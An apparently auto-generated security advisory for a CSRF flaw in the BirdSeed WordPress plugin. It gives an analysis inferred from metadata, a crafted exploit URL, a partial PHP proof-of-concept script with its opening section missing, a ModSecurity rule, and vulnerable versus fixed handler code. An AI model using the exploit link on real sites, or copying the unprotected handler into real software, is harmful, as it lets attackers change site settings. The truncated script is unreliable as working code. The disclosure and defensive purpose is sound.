Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: June 2, 2026

CVE-2026-4071: BirdSeed <= 2.2.0 Cross-Site Request Forgery via BirdSeed Token Change PoC, Patch Analysis & Rule

CVE ID: CVE-2026-4071
Plugin: birdseed
Severity: Medium (CVSS 4.3)
CWE: 352
Vulnerable Version: 2.2.0
Patched Version:
Disclosed: May 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4071 (metadata-based):

This vulnerability is a Cross-Site Request Forgery (CSRF) affecting the BirdSeed plugin for WordPress, version 2.2.0 and earlier. The issue resides in the birdseed_plugin_settings_page() function, which processes a 'birdseed_token' GET parameter and saves it via update_option() without any nonce validation. The CVSS score of 4.3 (Medium) reflects the low complexity, network-based attack vector, and limited impact of an integrity-only compromise.

The root cause is the complete absence of nonce verification in the birdseed_plugin_settings_page() function. Based on the CWE-352 classification and the description, Atomic Edge infers that the function directly calls update_option('birdseed_token', $_GET['birdseed_token']) without using wp_verify_nonce(), wp_nonce_field(), or any check_admin_referer() call. This is a confirmed vulnerability from the CVE description; no source code diff is available to confirm the exact line, but the pattern is clear from the description.

Exploitation requires tricking a site administrator into clicking a crafted link. The attack vector involves sending a GET request to the WordPress admin area endpoint that triggers the birdseed_plugin_settings_page() function, with the birdseed_token parameter set to an attacker-controlled value. For example, an attacker could construct a URL like http://target.com/wp-admin/options-general.php?page=birdseed&birdseed_token=attacker_token. When an authenticated admin clicks this link, the plugin silently updates the token in the database without any CSRF protection, allowing the attacker to replace the legitimate BirdSeed token.

Remediation requires implementing proper nonce validation in the birdseed_plugin_settings_page() function. The fix should include generating a nonce with wp_nonce_field() or wp_create_nonce() in the settings form, and verifying it with check_admin_referer() or wp_verify_nonce() before processing the birdseed_token parameter. Additionally, a capability check (e.g., current_user_can('manage_options')) should be enforced to ensure only authorized administrators can modify plugin settings.

The impact of this vulnerability is limited to unauthorized modification of the BirdSeed token setting. This could allow an attacker to disrupt analytics tracking, inject malicious tracking code, or redirect data to a third-party service. There is no direct data exposure, privilege escalation, or remote code execution possible through this CSRF flaw alone. However, an attacker could leverage the compromised token to perform further attacks against the site's visitors or backend systems.

Proof of Concept (PHP)

```php
<?php
// Atomic Edge CVE Research – Proof of Concept (metadata-based)
// CVE-2026-4071 – BirdSeed
// [gap: the text between "BirdSeed" and "$exploit_url) {", including the target list and loop header, is missing from the source]
$exploit_url) {
    echo "[*] Trying endpoint " . ($index + 1) . ": " . $exploit_url . PHP_EOL;

    // Step 1: Retrieve the admin nonce (if needed for initial page load)
    // Note: The CSRF vulnerability means we don't need a valid nonce to change the token.
    // We simply need to trick an admin to click this link.

    // For demonstration, we simulate the forged request using cURL
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $exploit_url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,
        CURLOPT_SSL_VERIFYPEER => false, // For testing; remove in production
        CURLOPT_SSL_VERIFYHOST => 0, // For testing; remove in production
        CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
        CURLOPT_COOKIE => '', // Attacker does not need cookies – the admin's browser sends them automatically when clicking the link
        CURLOPT_HEADER => true,
    ]);

    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($response === false) {
        echo "[!] Error sending request" . PHP_EOL;
        continue;
    }

    // Since we are simulating the victim's browser, we don't actually have cookies.
    // The real attack relies on the admin being logged in and following the link.
    // This PoC demonstrates the endpoint and parameter that the attacker would craft.
    echo "[*] HTTP response code: " . $http_code . PHP_EOL;

    // If we get a 200 or 302, the request was processed (though actual token change requires authentication)
    if ($http_code == 200 || $http_code == 302) {
        echo "[+] Exploit URL works – the admin's browser will process this request." . PHP_EOL;
        echo "[+] The attacker would send this link to an authenticated admin:" . PHP_EOL;
        echo "    " . $exploit_url . PHP_EOL;
        echo PHP_EOL;
        break;
    } else {
        echo "[-] Endpoint returned HTTP " . $http_code . " – may not be correct." . PHP_EOL;
    }
}

echo PHP_EOL;
echo "[*] Attack Scenario:" . PHP_EOL;
echo "1. Attacker crafts the exploit URL with a malicious token." . PHP_EOL;
echo "2. Attacker sends the link to a logged-in WordPress admin (via email, social engineering, etc.)." . PHP_EOL;
echo "3. Admin clicks the link while authenticated." . PHP_EOL;
echo "4. The plugin saves the attacker's token to the database without nonce verification." . PHP_EOL;
echo "5. Attacker now controls the BirdSeed token, potentially hijacking analytics." . PHP_EOL;
```

ModSecurity Rule

```
# Atomic Edge WAF Rule – CVE-2026-4071 (metadata-based)
# Block CSRF exploitation of BirdSeed token change via forged GET requests to admin settings page
SecRule REQUEST_METHOD "@streq GET" \
    "id:20264071,phase:2,deny,status:403,chain,msg:'CVE-2026-4071 – BirdSeed CSRF Token Change via admin page',severity:'CRITICAL',tag:'CVE-2026-4071',tag:'wordpress',tag:'csrf'"
    SecRule REQUEST_URI "@rx ^/wp-admin/(?:options-general|admin)\.php" "chain"
    SecRule ARGS:birdseed_token "@rx ^[a-zA-Z0-9_\-]+$" "t:none"
```
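The GET-based save pattern the analysis infers, beside the nonce- and capability-checked handler the remediation paragraph calls for. This is an added illustration, not BirdSeed's source or patch: the function name, page slug and option name follow the advisory, while the nonce action 'birdseed_save_settings', the field name 'birdseed_nonce' and the form markup are assumptions.

```php
<?php
// Added illustration, not BirdSeed's actual code. Option name and function
// name follow the advisory; nonce action, nonce field and markup are assumed.

// Vulnerable pattern (as inferred by the analysis, CWE-352): a bare GET
// parameter is written straight to wp_options, so any link a logged-in
// admin follows changes the token. No nonce, no capability check.
function birdseed_plugin_settings_page_vulnerable() {
    if ( isset( $_GET['birdseed_token'] ) ) {
        update_option( 'birdseed_token', $_GET['birdseed_token'] );
    }
    echo '<input type="text" name="birdseed_token" value="'
        . esc_attr( get_option( 'birdseed_token', '' ) ) . '">';
}

// Hardened version: the write happens only on a POST that carries a nonce
// bound to this action; check_admin_referer() verifies the nonce and the
// referer and calls wp_die() on failure, so a forged cross-site request
// never reaches update_option(). The capability check runs first, and the
// value is unslashed and sanitised before it is stored.
function birdseed_plugin_settings_page_fixed() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You do not have permission to change these settings.', 'birdseed' ) );
    }

    if ( isset( $_POST['birdseed_token'] ) ) {
        // Action and field name must match the wp_nonce_field() call below.
        check_admin_referer( 'birdseed_save_settings', 'birdseed_nonce' );
        $token = sanitize_text_field( wp_unslash( $_POST['birdseed_token'] ) );
        update_option( 'birdseed_token', $token );
        echo '<div class="updated"><p>BirdSeed token saved.</p></div>';
    }
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( 'birdseed_save_settings', 'birdseed_nonce' ); ?>
        <label for="birdseed_token">BirdSeed token</label>
        <input type="text" id="birdseed_token" name="birdseed_token"
               value="<?php echo esc_attr( get_option( 'birdseed_token', '' ) ); ?>">
        <?php submit_button( 'Save token' ); ?>
    </form>
    <?php
}
```

Because the hardened handler accepts the token only via a nonce-protected POST, the GET-only ModSecurity rule above no longer collides with a legitimate save, which it would under the original GET-based flow.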
